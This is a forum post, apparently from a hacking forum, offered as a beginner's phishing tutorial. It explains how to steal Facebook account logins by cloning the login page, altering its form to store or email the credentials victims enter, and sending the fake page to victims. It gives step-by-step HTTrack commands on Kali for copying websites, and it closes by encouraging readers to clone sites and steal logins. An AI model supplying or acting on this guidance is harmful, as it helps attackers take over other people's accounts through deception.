Phishing Tutorial For Beginners

Method: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone’s account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.

The easiest way to do this would be to follow a guide on how to clone a website to make an exact copy of the facebook login page. Then you’ll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available on YouTube. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it’s still possible, especially if you clone the entire Facebook website.

Step 1: Download & Install HTTrack
From Kali, you need to navigate to “System Tools” and then “Add/Remove Software.”
That will open a screen. Notice next to the “Find” button. Enter “httrack” there and it will find the packages you need to install HTTrack.
You can also install it by typing the following in a terminal.

kali > apt-get install httrack

Step 2: Use HTTrack
Now that you’ve installed HTTrack, you should start by looking at the help file for HTTrack. When you downloaded and installed HTTrack, it placed it in the /usr/bin directory, so it should be accessible from any directory in Kali as /usr/bin is in the PATH variable. Type this:

kali > httrack --help

The basic syntax is the following, where -O stands for “output.” This switch tells HTTrack where to send the website to.

kali > httrack <the URL of the site> [any options] URL Filter -O <location to send copy to>

Using HTTrack is fairly simple. you need only point it at the website you want to copy and then direct the output (-O) to a directory on your hard drive where you want to store the website. One caution here, though. Some sites are HUGE. If you tried to copy Facebook to your hard drive, I can guarantee you that you don’t have enough drive space, so start small.

Step 3: Test HTTrack
I’ve made a tutorial on hacking MySQL databases behind websites (MySQL is the most widely used database backend behind websites), I used a website that we could hack with impunity called webscantest.com. Let’s try to make a copy of that site to our hard drive.

kali > httrack http://www.webscantest.com -O /tmp/webscantest

As you can see, you should of successfully made a copy of all the pages of this site on your hard drive.

Step 4: Explore the Site Copy
Now that you’ve captured and copied the entire site to your hard drive, take a look at it.

You can open the IceWeasel browser (or any browser) and view the contents of your copied site to the location on your hard drive. Since you copied the web site to /tmp/webscantest, you simply point your browser there and you can view all the content of the website! If you point it to /tmp/webscantest/www.webscantest.com/login.html, you can see that you’ll have an exact copy of the login page!
Hmmm… What could you possibly use that for???

Step 5: Copy Your Favorite Web Site
Now, try HTTrack on your favorite website, sinister.ly. Try to make a copy of a forum post I wrote earlier about the Free Uber rides. First, let’s open that page right here and copy the address into Kali after the HTTrack command and then the location where you want send the copy to.

kali> httrack https://sinister.ly/Thread-Free-Uber-Rides-Introduction-to-Forums -O /tmp/freeuber

You can send the copied website to any location, but I sent mine to /tmp/freeuber. When you do so, HTTrack will go into Sinister, grab that webpage, and store an exact copy of it on your hard drive. Notice it also tells us how many bytes.

You should be able to see, you were able to copy my Sinister post on Free Uber Rides to your Kali drive and open an exact copy of it with your browser.

If you are trying to find information about a particular company for social engineering or trying to spoof a website or login, HTTrack is an excellent tool for both tasks. I’m sure many of you have pondered with the idea of creating a clone of your favorite website and stealing logins… Or maybe you haven’t!

Happy learning!

5 Likes